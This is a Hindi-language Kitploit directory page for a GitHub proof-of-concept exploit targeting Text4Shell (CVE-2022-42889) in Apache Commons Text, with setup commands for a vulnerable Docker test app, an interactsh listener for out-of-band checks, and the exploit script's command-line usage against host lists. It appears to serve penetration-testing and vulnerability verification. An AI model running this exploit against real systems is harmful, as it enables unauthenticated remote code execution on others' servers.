Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
text4shell-exploit — CVE-2022-42889 - Text4Shell एक्सप्लॉइट | Kitploit
उपकरण/GitHubGitHub/gokul-ramesh/text4shell-exploit
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंट
GitHubgokul-ramesh/text4shell-exploit

text4shell-exploit

CVE-2022-42889 - Text4Shell एक्सप्लॉइट

रिपॉजिटरी देखें
133 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Text4shell-exploit

यह उस भेद्यता का प्रूफ ऑफ कॉन्सेप्ट है जो Apache Commons Text [CVE-2022-42889] में मौजूद है।

संवेदनशील संस्करण : 1.5.0 से (शामिल नहीं) 1.10.0 तक

प्रभाव

इस भेद्यता के सफल शोषण से एक अनप्रमाणित हमलावर संवेदनशील एसेट पर मनमाना कोड निष्पादित कर सकता है।

PoC को सत्यापित करने के लिए संवेदनशील एप्लिकेशन

@securekomodo द्वारा विकसित एप्लिकेशन, यहाँ संलग्न है।

Docker

इस एप्लिकेशन को docker-registry से भी लोड किया जा सकता है।

root@kitploit:~
docker run -p 8080:8080 gokul2/text4shell-poc:latest

एप्लिकेशन अब localhost:8080 पर उपलब्ध होगा।

सत्यापन

मनमाना कमांड निष्पादन को सत्यापित करने के लिए, हम interactsh का उपयोग करते हैं, जो @projectdiscovery द्वारा OOB इंटरैक्शन कैप्चर करने का एक टूल है।

Interactsh-client सेट करना

वास्तविक एक्सप्लॉइट निष्पादित करने से पहले interactsh-client सेट करें।

root@kitploit:~
docker run projectdiscovery/interactsh-client:latest

एप्लिकेशन शुरू करने के बाद सूचीबद्ध डोमेन पर ध्यान दें।

root@kitploit:~
[INF] Listing 1 payload for OOB Testing
[INF] xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.oast.pro

उपयोग

root@kitploit:~
python3 exploit.py -u [host] -i [input-file-with-targets] -v [interactsh client domain] -p [proxy(optional)]
python3 exploit.py -u [host] -t [single target path] -v [interactsh client domain] -p [proxy(optional)]

सत्यापन

एक्सप्लॉइट को मान्य करने के लिए interactsh-client में लॉग देखें।

टूल डाउनलोड करें